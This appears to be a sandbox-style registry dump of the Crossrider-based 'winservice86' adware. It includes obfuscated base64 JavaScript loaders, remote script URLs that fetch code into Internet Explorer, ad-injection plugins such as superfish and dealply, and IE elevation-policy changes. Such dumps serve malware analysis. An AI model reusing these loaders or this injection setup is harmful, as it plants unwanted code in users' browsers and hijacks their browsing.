    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MTk0YjAwMWYwMTE3MmQxYTFlNTM1ODRiMDAxZjAxMTc0MjQ3NWQxMjA2MDcwYjBhMTYwZjFkNDUxMzVmMDMwMjA5MDYxNDBlMTAwYzVjMWYwNzFkNDcxODAwMDU1NzAwNDI0ODVhNWIwYTBlNWEzODI3MmIyMDNlMzEzYTNhMjIzMTIyMmEzNzM3MjkzNjJjMjYyZjMwMjMyNzNiMjczMzNkMjAyYzM0MmE0ODE0NDYxODAyNWQxOTAxMGY0ODU1NGE1MTQ2NTcwNzExMWM1NjJhMzgzYjNhM2QyMjMxM2IyMTJmMzAzNTI3MjkyMjIxM2QyNzI5MjYzMDM4Mjc0YTVlNTMwYTFkMWMxYjA2MzIwYTA0NTA0YjQwMDExYzFmMDUxNDQyNDc1ZDEyMDYwNzBiMGExNjBmMWQ0NTEzNWYwMzAyMDkwNjE0MGUxMDBjNWMxZjA3MWQ0NzE4MDAwNTU3MDA0MjQ4NWE1YjBhMGU1YTM4MjcyYjIwM2UzMTNhM2EyMjMxMjIyYTM3MzcyOTM2MmMyNjJmMzAyMzI3M2IyNzMzM2QyMDJjMzQyYTQ4MTQ0NjE4MDI1ZDE5MDEwZjQ4NTU0YTUxNDY1NzA3MTExYzU2MmEzODNiM2EzZDIyMzEzYjIxMmYzMDM1MjcyOTIyMjEzZDI3MjkyNjMwMzgyNzRhNWU1MzEyMDUxZDBjMWMwOTMxMGM1MDRiNTE1MDU5MTY=', 'bihkugxhrq'); }"

    [HKCU\Software\winservice86\Plugins\354]
    "JavaScript" = "__CTG_MAPPING__={""1"":[""d908e50170d7cb46a92fdbff0d73bb5d""

    [HKCU\Software\Crossrider]
    "Bic" = "8D4C23D6A4134239976F389726A57621IE"

    [HKCU\Software\winservice86\Plugins\275]
    "Name" = "pricedetect_sidebar_small_m"

    [HKCU\Software\winservice86\Plugins\47]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/47.js"

    [HKCU\Software\winservice86\Plugins\44]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(a){appAPI.dns={};appAPI.dns.resolveIP=function(b){return a.resolveIp(b);};appAPI.fetchUrl=function(b){return a.fetchUrl(b);};appAPI.openURL=function(e,d){var c;if(typeof e===object){c=e;if(typeof a.openUrlEx!==undefined){a.openUrlEx(appAPI.JSON.stringify(c));return;}else{d=c.where;e=c.url;}}if(typeof e!==string){console.error(appAPI.openURL - Invalid parameter. Expected string (1st param) but got: (typeof e));return;}if(d!==current&&d!==tab&&d!==window&&d!==popup){console.error(appAPI.openURL - Invalid parameter. Expected current/tab/window (2nd param) but got: d);return;}if(typeof a.openUrlEx!==undefined){var f=(document&&document.documentElement&&document.documentElement.clientHeight)?document.documentElement.clientHeight 100:100;var h=(document&&document.documentElement&&document.documentElement.clientWidth)?document.documentElement.clientWidth 80:100;var g=(window&&window.screenTop)?((window.screenTop-20)<0?0:(window.screenTop-20)"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{132cc74c-c1b1-4c00-8ea0-e4d27a15def2}]
    "Policy" = "1"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8b7f6268-f316-4f24-b4a4-efb0124290bd}]
    "AppPath" = "%Program Files%\winservice86"

    [HKCU\Software\winservice86\Installer]
    "Time" = "1456422014"

    [HKCU\Software\winservice86\Plugins\47]
    "JavaScript" = "(function(){appAPI.ready=function(a){appAPI.resources.isReady(a);};}());var CrossRiderResourcesManager=(function(){var C={appId:(function(){var D=appAPI.appInfo;if(D){return appAPI.appInfo.id;}else{return appAPI.appID;}})(),url:{base:{production:[""\x68\x74\x74\x70\x3a\x2f\x2f\x72""

    [HKCU\Software\winservice86\Installer]
    "CodeDownloadDomain" = "http://js.newdemoonlinecloud.com"

    [HKCU\Software\winservice86\Plugins\311]
    "Name" = "dealply_mac_m"

    [HKCU\Software\winservice86\Plugins\36]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/36.js"

    [HKCU\Software\winservice86\Plugins\102]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/102.js"

    [HKCU\Software\winservice86\Manifest]
    "ThanksUrl" = "NA"

    [HKCU\Software\winservice86\Plugins\311]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MWE3NDZlNDM0NTUxNTE0OTFlMWUxNTA5MzExMTA5NTM0YjRiNTQwMjE1MGQxNDU5NGE1ZTE4NDUxNTE4MDMxZjA5MDAwZjAyNWYwMjE4MGMwZTU2MDcxMTA3MTcxYzA4NTkwMDAwMGYwNTEwMDYwMzE4MWIwMjQ0MGIwYTViMDAwZDEwMWYwNTEzMDY1YzFhMTYwNzE3MmUyZTM0MzUzODJlMmEzNzMxMmMzNTM0MzkyOTJmMzkyZDIxMmQyMTM0MzUzNDI1M2YyMzI2MmQyNzNhMmU1NzBhMDYxYTM1MTAxMDBmMDA0YzJlMzQzNTM4MmUyYTM3MzEyYzM1MzQzOTI5MmIzMTI5M2IyZDI0M2MzNDM0Mjk0YzA5MTAwMDVlM2EyZTMyMzkzOTM5MzIyYjJkMjcyMDIzMmUzZTI1MmYzMzI2MmQyNzNhMmU1MzQ3N2I2MDQxNTk0NDQzNDcxOTA1MWYwNjE5MzQwYjA4NDE1ZjUxNTMwMzAyMWUxMTBhNWU0YzRhMTgyZTA4MDQwODA3MTQwNzA5MTYyZTE4MDUxMDA1NGYwZDA4MTAwNjE1MWY0NTE1MDUwYzU2MDcxMTA3MTcxYzA4NTkwMDAwMGYwNTEwMDYwMzE4MWIwMjQ0MGIwYTViMDAwZDEwMWYwNTEzMDY1YzFhMTYwNzE3MmUyZTM0MzUzODJlMmEzNzMxMmMzNTM0MzkyOTJmMzkyZDIxMmQyMTM0MzUzNDI1M2YyMzI2MmQyNzNhMmU1NzBhMDYxYTM1MTAxMDBmMDA0YzJlMzQzNTM4MmUyYTM3MzEyYzM1MzQzOTI5MmIzMTI5M2IyZDI0M2MzNDM0Mjk0YzA5MTAwMDVlM2EyZTMyMzkzOTM5MzIyYjJkMjcyMDIzMmUzZTI1MmYzMzI2MmQyNzNhMmU1MzQ3N2I2MDQxNTk0NDQzNDcwMTFkMWUxMTAzMGYzMDAwNDE1ZjUxNDI1"

    [HKCU\Software\winservice86\Manifest]
    "PluginsManifestVersion" = "37"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{132cc74c-c1b1-4c00-8ea0-e4d27a15def2}]
    "AppName" = "winservice86-bg.exe"

    [HKCU\Software\winservice86\Plugins\42]
    "Version" = "10"

    [HKCU\Software\winservice86\Plugins\41]
    "JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(a){appAPI.isBackground=false;appAPI.tabId=a.getBhoInstanceId();appAPI.getTabId=function(){return appAPI.tabId;};appAPI.isActiveTab=function(){return appAPIinternal.isActiveTab();};appAPI.platform=""IE"";if(typeof appAPI.appInfo===""undefined""){appAPI.appInfo={};}var c=appAPI.internal.prefs.getChar(""fullVersionForUrl""

    [HKCU\Software\winservice86\Plugins\424]
    "Name" = "sharonl_vid_ws_m"

    [HKCU\Software\winservice86\Plugins\269]
    "Name" = "stats_ie"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "History" = "%Documents and Settings%\%current user%\Local Settings\History"

    [HKCU\Software\winservice86\Plugins\47]
    "Name" = "resources_background"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Paths" = "4"

    [HKCU\Software\winservice86\Code]
    "BgJavaScript" = "/************************************************************************************ This is your background code. For more information please visit our wiki site: http://docs.crossrider.com/#!/guide/scopes_background*************************************************************************************/appAPI.ready(function($) { // Place your code here (ideal for handling browser button, global timers, etc.)});"

    [HKCU\Software\winservice86\Installer]
    "CodeDownloadFbDomain" = "http://js.clientdemocloud.com"

    [HKCU\Software\winservice86\Plugins\380]
    "Name" = "callcenter_j_m"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winservice86]
    "DisplayIcon" = "%Program Files%\winservice86\utils.exe"

    [HKCU\Software\winservice86\Plugins\3]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/3.js"

    [HKCU\Software\winservice86\Plugins\46]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal===undefined){appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}}}appAPI.internal.callbacks.timersListeners={};appAPI.internal.callbacks.timersIsInterval={};appAPI.internal.callbacks.timer=function(b){var a=b.timerId;if(typeof a!==number){return;}if(typeof appAPI.internal.callbacks.timersListeners[a]===undefined){return;}var d=appAPI.internal.callbacks.timersListeners[a];if(!appAPI.internal.callbacks.timersIsInterval[a]){clearInterval(a);delete appAPI.internal.callbacks.timersListeners[a];delete appAPI.internal.callbacks.timersIsInterval[a];}try{d();}catch(c){console.error(setInterval/setTimeout - Caught an exception from user callback: (typeof c.message===string?c.message:???));}};(function(a){appAPI.setInterval=function(d,c,e){if((typeof d!==undefined)&&(typeof c===number)){var b=a.setInȱ"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8b7f6268-f316-4f24-b4a4-efb0124290bd}]
    "Policy" = "3"

    [HKCU\Software\winservice86\Plugins\262]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MWY2MTUyNDE0NzU3NDcwZTEyMDAxNDNlMDAwZDQ1NGQ0NTQ0MGUwMDEwMWI0ODRlNDgxNDAxMDgwNTE1MDcwMzE3NTA0YTE2NGIwNzBkMTUwOTBhMWIwOTAzNTkwYjAzMTI1YjE3MWUxMDRlMTE0NDU3NTc1ZjE2MDA0NDJkM2UyNDI1MmEzNTM1MjYyZDJmMzczMzM4MzIzZDMyMjMzYTIwMmUzNjNlMzQyMjI3MzkyZjMwM2IzNDVkMGQ0OTFkMTY1OTE2MWQwMDU2NDM1NjU1NDc0MzAzMWUwMDU5MzQyZDIyMzUzODM2MzUzNDNkMjAyZTIwM2UyNjI3MzUzOTI4MzUyOTJlMmQzZTQxMDQxYzE1MTIxMTA5MDIxNjVjMzgyODI2MzQyOTI3MzczOTNiMjUyMjI1M2EyZjI4MjczMDJhM2UyZDIyMjUzYTMzMzUzMTM2MzQzYjI1MzgyODQ3NGE2YzU0NDQ0YjUyNDMwZjAzMTExNjE1MjExNjA3NTA1YjQ3NTUwZDEyMTIwNDE3NTE1ZDRlMDQxMzBiMDUwNzE3MGMwZTQzNGMwNjU5MDQwZDA3MTkwNTAyMWEwNTQ5MTkwMDEyNDkwNzExMDk1ZDE3NTQ0NTU0NWYwNDEwNGIzNDJkMjIzNTM4MzYzNTM0M2QyMDJlMjAzZTIyMmYzMTIzMjgzMDIxMmYyZDMyMzIzNTNhMmYyMjJiM2I0NDFlNGYwZDA0NWExNjBmMTA1OTVhNDU1MzU3NTEwMDFlMTI0OTNiMzQzMTMzMjgyNDM2MzQyZjMwMjEzOTJkMjAzNzI3M2EyODI3MzkyMTM0MmQ0NzE0MGUxNjEyMDMxOTBkMGY0ZjNlMzgzNDM3MjkzNTI3MzYyMjM2MjQzNTI4MmMyODM1MjAyNTI3M2UyNDM1MjgzMDM1MjMyNjNiMjIzNjNlMzg1NTQ5NmM0NjU0NDQ0YjUwMTEwYjAyMDI"

    [HKCU\Software\winservice86\Plugins\104]
    "Version" = "12"

    [HKCU\Software\winservice86\Plugins\102]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MGU3OTQzNDk1MTVhNDExODAyMTkwNTI2MTEwNTUzNDA0MzUyMWUxOTAxMDM1OTQ2NWUxMzRkMTMwNDA5MDcxNzEzMDMwMjU0MGExZTEwMDI1YTEwMTEwZDAzNTUwOTExMDAwYzA2MTAxMTAwMDEwZTRkMWEwNTUyMTYxYjAyMDcxZjFmMGY0ZDE1MWYxMTAxM2MzNjJlMzkzMTNmMjUzZTI3M2EyNzJjMjMyNTI2MjgyMjI4M2IzNzI2MmQyZTI5MzYzMjI5MjQzMTJjM2M0ZjEwMGExMzI0MWYxOTE5MTY1ZTM2MmUzOTMxM2YyNTNlMjczYTI3MmMyMzI1MjIyMDI2MzIzYjMyMmUyYzJlMjU0NTE4MWYwOTQ4MmMzYzJhMjMzNTMwMjMyNDI0MzEzNjMxMzYyNDI5MjYyMjI5MjQzMTJjM2M0YjVkNzA0MzUwNTY0ZDU3MWIxNzFkMDEwOTM2MDIxYTRmNGY1MzQxMDEwNTBlMTMwMzRjNDI1YTFhM2MwYTAzMWUxMTE0MDYwNzA2MmMwYTA3MTcxNTRkMDQxYTFlMTYxNzBkNDcxMjE1MGU1ZjE1MWYxMTAxNGMwMzEwMGMwMjAzMTUxZjFjMDMxNzQ3MWIwOTVjMTMxZTBjMWIxZDA2MDU0YzE5MTExNDA0MzIyYTJjMjAzYjNlMjkzMDIyM2YyOTMwMjEzYzJjMjkyZTI2M2UzMjI4MzEyYzMwM2MzMzI1MmEzNDI5MzI1MzEyMTMxOTI1MTMxNzFjMTM1MDJhMmMyMDNiM2UyOTMwMjIzZjI5MzAyMTNjMjgyMTJhM2MzZTM3MjAzMDJjM2M0ZjE5MTMwNzRkMjkzMjM2MjEyYzNhMjIyODJhMzQzMzNmMmEyNjMwMmMyMzI1MmEzNDI5MzI1NzVmNDM0OTUxNWE2OTUwNTY0ZDU1NTExMzA1MDQxZDBhMWUzZjA5NTc0OTQzNTg0MTQ4Njk"

    [HKCU\Software\winservice86\Update]
    "LastCheck" = "1456422028"

    [HKCU\Software\winservice86\Plugins\345]
    "JavaScript" = "__INFORMATION_MAPPING__={ads:[101,108,116,117,125,126,135,141,158,159,170,171,174,178,180,192,193,206,211,225,230,231,232,233,239,241,261,264,266,279,284,289,297,300,302,306,309,310,314,333,334,339,340,344,363,368,372,374,379,387,388,393,399,408,410,413,415,416,418,421,424,437,446,452],pops:[108,127,155,170,179,190,195,197,208,221,224,265,273,277,278,280,281,292,293,294,296,262,303,324,337,338,341,343,346,347,356,357,358,390,396,401,423,436,439,440,450,459],intext:[103,117,123,142,259,263,342,359,360,391,402,442],shopping:[92,93,102,104,117,124,128,138,184,191,198,199,200,204,213,215,218,223,227,228,234,235,237,242,243,256,260,254,275,282,288,290,295,301,304,307,308,311,317,325,327,328,335,350,351,369,370,371,375,385,389,397,409,411,412,414,419,441,443,444,451,453,457]};"

    [HKCU\Software\winservice86\Plugins\263]
    "Name" = "intext_5_j_m"

    [HKCU\Software\winservice86\Plugins\94]
    "Name" = "IEPopup"

    [HKCU\Software\winservice86\Plugins]
    "OnRequestPluginList" = "14,42,41,39,38,43,45,64"

    [HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{84f03351-931d-41a5-a53d-6b5a7a5a2c96}]
    "Bic" = "8D4C23D6A4134239976F389726A57621IE"

    [HKCU\Software\winservice86\Plugins\4]
    "Version" = "5"

    [HKCU\Software\winservice86\Plugins\46]
    "Version" = "5"

    [HKCU\Software\winservice86\Plugins\275]
    "Version" = "3"

    [HKCU\Software\winservice86\Plugins\93]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MTE2ZTY4NTUwYzFhMTkxYTI1MTQwNjQ2NWI1NzQ2MDYxOTFlMDA1YzQ1NGIxNjAwMTM0MDFlMWYwMDAzMTgwMjA4MDQwYzQwMGUwNTFkNDkxZDE3NGUwNDAyMzEwMDBiMTkwODQ0MGUxMjA3NWIwYTAxMTkxZjEzMTgwNzA0NGEwYzA2MWIxMDFkMGYwMTEzNDcwMjE3MGIxZjIzMTQ1YjBiMDYwMjUxMjczYTI0MmU0ZDM5MzUyNzMzMzgzNzNkM2YyMzM0MjMzODNiMjQyZjMwMmIyMzJlMzUyMjM1MzczNDM1M2IyNzI5MzUyZjQwMWEwNTEzMDMwYTBiMWYwNDExMGIwZjU5M2UyODI3M2MyMjM5MjMzNDIzMjAyNDI1M2IyZjNkM2EyZjI4MmIyOTI0MjgzYjRjNDE2MDc5NDQwMjEwMTUwNzE3M2IxZjA2NTI1YzRhNDYwOTAzMTAxZTFlNTA1ZjQ5MWQxMzE2NTkxNzFiMWQwZjAyMDAwMzE3MDk1OTA3MDEwMDQ1MDcxNTQ1MTcwNzI4MDkwZjA0MDQ1ZTBjMTkxNDVlMTMwODFkMDIxZjAyMDUwZjU5MDkxZjEyMTQwMDAzMWIxMTRjMTExMjEyMTYyNzA5NTcxMTA0MDk0MjIyMjMyZDJhNTAzNTJmMjUzODJiMzIyNDM2MjcyOTJmMjIzOTJmM2MzNTMyMmEyYTI4MmUyZjM1M2YyNjNlM2UyMDMxMzI0YzAwMDcxODEwMGYxMjE2MDAwYzA3MTU1YjM1M2IyMjI1MmIzZDNlMzgzOTIyMmYzNjNlMzYzNDNlMzIyNDMxMmIyZjNiM2U1NTQ4NjQ2NDQ4MDAwYTFmMDMwODE5MmQwYTRmNTA1MDVmNTk2ZTFj', 'jdawdnmjpf'); }"

    [HKCU\Software\winservice86\Plugins\104]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/104.js"

    [HKCU\Software\winservice86\Plugins\4]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/javascripts/jquery-1_7_1_min.js"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{132cc74c-c1b1-4c00-8ea0-e4d27a15def2}]
    "AppPath" = "%Program Files%\winservice86"

    [HKCU\Software\winservice86\Plugins\246]
    "Version" = "15"

    [HKCU\Software\winservice86\Plugins\273]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/273.js"

    [HKCU\Software\winservice86\Plugins\221]
    "Version" = "4"

    [HKCU\Software\winservice86]
    "ActiveAppId" = "64755"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8b7f6268-f316-4f24-b4a4-efb0124290bd}]
    "Policy" = "3"

    [HKCU\Software\winservice86\Plugins\246]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/246.js"

    [HKCU\Software\winservice86\Plugins\46]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/46.js"

    [HKCU\Software\winservice86\Plugins\269]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/269.js"

    [HKCU\Software\winservice86\Plugins\2]
    "JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"

    [HKCU\Software\winservice86\Plugins\221]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/221.js"

    [HKCU\Software\winservice86\Installer]
    "StatsDomain" = "http://stats.newdemoonlinecloud.com"

    [HKCU\Software\winservice86\Plugins\200]
    "Name" = "foxydeal_m"

    [HKCU\Software\winservice86\Plugins\45]
    "Version" = "4"
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.tabId=onRequest;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;(function(){function a(e){var c=appAPI.internal.prefs.getChar(e,Crossrider\\onRequest);if(typeof c!==string){return 0;}if(c.length===0){return 0;}c=appAPI.JSON.parse(c);if(typeof c!==object){return 0;}var d=0;for(var b in c){d ;appAPI.internal.callbacks.addListener(onRequest,function(m,g){var n=appAPI.internal.callbacks.onRequest.listenersAdditionalData[g];if(typeof n.code!==string){return;}var f={};var i;if(typeof n.value===undefined){i=undefined;}else{if(n.value===n"

    [HKCU\Software\winservice86\Plugins\288]
    "Version" = "4"

    [HKCU\Software\winservice86\Plugins\42]
    "Name" = "IEInternal"

    [HKCU\Software\winservice86\Installer]
    "FullVersion" = "1.35.9.29"

    [HKCU\Software\winservice86\Plugins\273]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MTA2MTRmNDU1OTUwNDQwNjE1MDUxYjNlMWQwOTViNGE0NjRjMDkwNTFmMWI1NTRhNTYxNDU3MWYxMDE1MGYxZTA5MDQxNTQ0MDI1YjU5NWYwODA3MDAxMDFkMTYxNDAxMGYwNTQ1MDUwYTExNTYwMzA1MWMwODAxMWYxODQwMDYxNjFlMTIwYjE5MDUxZTBhMDMwZjBhNWYxMDVjNGUxMjFmMTMwNTE2NTcxYTE1NTEwMDE3MGQzNDA2MDE0NDQxNTc1YTU0NTcxODFlMGQwNDFmMTYzOTA3MDU0YzM0MzQyYzM3MzYyMzM1M2MyODM1MmUzOTMwMjAyMTI0MjMyMDI1MzQyZjM0M2MzMDNiMmYyZjJhM2UyZTRkMTgwZDE3MTgxZTAyNTMzZTJlMjgzOTIwMzYyYTIyMmYyYTI0MjMzNDJhM2YzNTI2M2UyNzIzMjQyZTM0NDk0MzZmNTk1MDQ2NGU0MzE5MWYxZjFmMTYyYzAyMGE0YzViNTE0OTAzMWIxMTA5MDM1YzQxNGUxNTVhMWExZTAxMWQwNTAwMGYwZDQ1MGY1ZTU3NGIxYTFjMDkxYjA1MTcxOTA0MDExMTU3MWUwMzFhNGUwMjA4MTkwNjE1MGQwMzQ5MGQwZTFmMWYwZTE3MTEwYzExMGEwNDEyNWUxZDU5NDAwNjBkMDgwYzFkNGYxYjE4NTQwZTAzMWYyZjBmMGE1YzQwNWE1ZjVhNDMwYTA1MDQwZjA3MTczNDAyMGI1ODI2MmYyNTNjMmUyMjM4MzkyNjIxM2MyMjM5MmIzOTI1MmUyNTJiMjAzZDJmMzUzYjIzMmUyMjJmMzAzYTVmMDMwNDFjMDAxZjBmNTYzMDNhM2EyMjI5M2QzMjIzMjIyZjJhMzcyNjMxMzYzZTNlM2YyYTI2MmEzYTI2NTI0YTY0NDE1MTRiNGI0ZDE1MTUwNTAxMDcwZjM4MGY0OTU1NDU0YjQ3NTU"

    [HKCU\Software\InstalledBrowserExtensions\17638\Status]
    "Installed" = "1"

    [HKCU\Software\winservice86\Plugins\223]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/223.js"

    [HKCU\Software\winservice86\Manifest]
    "DisableIe" = "true"
    "RunInFrame" = "false"

    [HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{84f03351-931d-41a5-a53d-6b5a7a5a2c96}]
    "srcid_var" = "002201"

    [HKCU\Software\winservice86\Plugins\93]
    "Name" = "superfish_no_coupons_m"

    [HKCU\Software\winservice86\Code]
    "NewTabJavaScript" = ""

    [HKCU\Software\winservice86\Plugins\263]
    "Version" = "2"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winservice86]
    "Publisher" = "Corporate Inc"

    [HKCU\Software\winservice86\Plugins\39]
    "Version" = "5"

    [HKCU\Software\winservice86\Manifest]
    "PublisherId" = "17638"

    [HKCU\Software\winservice86\Plugins\200]
    "Version" = "6"

    [HKCU\Software\winservice86\Plugins\376]
    "Name" = "loaderBackup"

    [HKCU\Software\winservice86\Plugins\223]
    "Version" = "8"

    [HKCU\Software\winservice86\Plugins\78]
    "Name" = "CrossriderInfo"

    [HKCU\Software\winservice86\Plugins\195]
    "Version" = "28"

    [HKCU\Software\winservice86\Plugins\3]
    "JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

    [HKCU\Software\winservice86\Manifest]
    "SetNewTab" = "false"

    [HKCU\Software\winservice86\Plugins\9]
    "Name" = "search_engine_hook"

    [HKCU\Software\winservice86\Plugins\91]
    "JavaScript" = "(function(K){var y=[].slice;var x={};var a=function(ap){if(typeof ap==string&&typeof ap.trim==function){return ap.trim();}return ap==null?:ap.toString().replace(/^\s /,).replace(/\s $/,);};function f(ap){var aq=x[ap]={},ar,at;ap=ap.split(/\s /);for(ar=0,at=ap.length;ar
    [HKCU\Software\winservice86\Plugins\94]
    "Version" = "2"

    [HKCU\Software\winservice86\Plugins\376]
    "JavaScript" = "(function(){var a=(function(){var l=function(){return appAPI&&appAPI.installer&&appAPI.utils.isFunction(appAPI.installer.getAdditionalInfo)?appAPI.installer.getAdditionalInfo():null;};var j={ie:10,ni:11,te:19,ch:20,to:26,sb:27,op:28,tc:29,ff:30,tf:39,sf:40,nv:50,ms:51,mf:52,mc:53,np:54,sm:55,fm:56,cm:57,mx:60};var p=source_id;var k=776;var e=__PageActive__;var q=new Date(2013,0,1);var f=1000*60*2;var n=1000*60*10;var o=(appAPI&&appAPI.installer&&typeof appAPI.installer.getUnixTime===function)?appAPI.installer.getUnixTime()*1000:((new Date(2013,0,1)).getTime());var h=l;var g=[{pluginId:288,httpUrl:http://istatic.eshopcomp.com/fo/min/crqc.js?hid=__CROSSRIDER_USER_ID__&bname=__CROSSRIDER_APP_NAME__&subid=__CROSSRIDER_EXTENDED_SUB_ID__,httpsUrl:https://istatic.eshopcomp.com/fo/min/crqc.js?hid=__CROSSRIDER_USER_ID__&bname=__CROSSRIDER_APP_NAME__&subid=__CROSSRIDER_EXTENDED_SUB_ID__,delay:0},{pluginId:242,httpUrl:http://inst.shoppingate.info/js/sg_bg.js?AFFILIATE"

    [HKCU\Software\winservice86\Plugins\193]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MWQ2MjdhNDMwMzBlMTIwMDM4MDIwYTRhNDk0MTQ5MTIxMjA0MWQ0YTQ5NDcxMjEyMTkwYzRiMTE0MzExMGQwOTFlMDAwMjEyMDI1ZTAzMTUxMjQ3MDAwNTQ0NGI1MTQwNWQ1ZjU3NTg0MTU1NDUxMDE1NTI0MTdhNmY0YTFiMTUxZjBhMTUyNTFmMWM0NDUyNTM0MzAzMGUxMjAwMWU0YTQ5NDcxMjEyMTkwYzRiMTE0MzExMGQwOTFlMDAwMjEyMDI1ZTAzMTUxMjQ3MDAwNTQ0NGI1MTQwNWQ1ZjU3NTg0MTU1NDUxMDE1NTI0MTdhNmY0YTAzMGQxZTFkMGYxZTI0MTQ0NDUyNTM1MDUyNDk0YTdhNGQ1MDQ2NDg1MTE3MGUwODEyMTkwZTExMGE0YTQ5NDEzMDU4MDcxNDFlNTIzYjQ0Nzk0MTRiNWE0NjUyMDQxZTBhMDExZDA0MjEyOTQ0NGE0ZDUyMTEwMTFkMDUwNDBkNDgyZjFmMDYxYzU5NDQ1MTViMDI1NzQwNWY0NDQ2NTU1MzFhNGI1ZDE2MDUwZjFjMGYxYjFiMDQxOTI1MTUwNTBmMTkwMjRmNDk0MTRjMjUzOTMzM2YzZjM1M2IyMTI4MmYzZjM0MmYyODI4MzIyZDNkMjUyZTNlMzkyMzM4MzIzOTIxMzczZTM0NWQ0YTUwNGExMTAyMGMxYzBmMDUxYjBiMTU0YTRhNDY0ZjJjM2UyODI4MjkyMzNlMjIyZjJjMzYzMzM0M2IzNjIwMzIzZTI3MjUzNjNlMzQ1ZDFiNGI0ZjdhMWI=', 'fhsakzfpmp'); }"

    [HKLM\SOFTWARE\InstalledBrowserExtensions\17638\Status]
    "Installed" = "1"

    [HKCU\Software\winservice86\Plugins\253]
    "URL" = "http://js.newcloudrack.com/plugins/mins/253.js"

    [HKCU\Software\winservice86\Plugins\180]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MTU2MDY1NDUxYTE5MWIxZTMyMTAwMjQ4NTY0NzUwMDUxYjFhMTc1ODQxNDUwZDQ5MDYwYjE3MDcxNjRjMGQwNTAxNDgxMzQzMWYwNjE3NWQ1ODU4NWExNTE3MGI1ZDUzMzgzZDJkMzgyMzM0MjEzZjI2MmEyMjMwMzEyZjM0MzMzNzIzMmIyYjIzM2QzZDNmMmUzODNiMjkzMDMxNDE1NDVjNWMyMjA2MWYwODUyMzEzODIxM2MyNTNmMzQyMDI0MmIyYjM1M2QyZjNhM2MzODNjMmMyMjJiMzgzZDQ4NWM1ZTUxMDAwODA5NWQ1YTNkMzEyOTNlMjgyMTNlM2QyNzIzMjczYzM1MzkzNDM3M2YzMDI3MjMzZDMxNGM1YTU1NDQxZjBhMDg1NjVmNTg1OTViNTU0NDBiNTg1ZDUwNTE1OTU4NWE1ZTQ0NTk1OTViNTA1MDQ4MWUwOTBlMTY1MDMwMzEyNDMwMjEzOTNmMzUzYjI5MmEzYzM4MjMzZTNhMzMyZTM2MzIzMDQ4MTMxNzA3MGU1MTM4MmQyZTNkMjEzNDMxM2MyMzI4MjIyMDMyMjYyMDM0MzYyZjI2MjAyMjIwMzIzYTNkMjIzMDMxMjMyODM4MmQ0ZjQzNjQ2ZTQwMDYxZTE4MTcwMTM4MWQwMjQ1NTg0ZTQ4MDQxMzA2MWQxYzU0NDg0ZDBmNDQxODAxMGEwNDFlNDAwNDBkMDM0NTBkNDkwMjA1MWY1MTUxNTA1ODE4MDkwMTQwNTAzMDMxMjQzMDIxMzkzZjM1M2IyOTJhM2MzODI3MzYzZTI5MjkzNjI4MmIzMTM0MzcyYzM1MjUyMzJkMzI0OTU4NTU1NDIwMGIwMTAyNGYzMjMwMmQzNTJkM2QzOTNlMmUzNjI4M2QzMTI2MzIzZTM1MjIyNjNmMjgzMDMxNDE1NDVjNWMxZTAyMTQ1ZTUyMzEzODIxM2MyNTNmMzQyMDI0MmI"

    [HKCU\Software\winservice86\Plugins\223]
    "Name" = "imonomy_m"

    [HKCU\Software\winservice86\Plugins\242]
